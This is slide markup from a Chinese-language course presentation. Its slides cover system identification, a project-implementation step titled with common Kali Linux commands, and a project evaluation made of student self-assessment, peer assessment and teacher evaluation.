                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生自评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3513239"/>
            <a:ext cx="4302496" cy="524299"/>
            <a:chOff x="6627851" y="3492048"/>
            <a:chExt cx="4302496" cy="524597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3492048"/>
              <a:ext cx="1402080" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="562331" y="4955527"/>
            <a:ext cx="4302496" cy="525366"/>
            <a:chOff x="6627851" y="5163977"/>
            <a:chExt cx="4302496" cy="525665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="5163977"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5382763"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 576"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5193635"/>
              <a:ext cx="2011680" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>教师综合评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 577"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="5210848"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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a:xfrm>
            <a:off x="533756" y="1946091"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Kali Linux常用命令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="936625" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>步骤一 </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
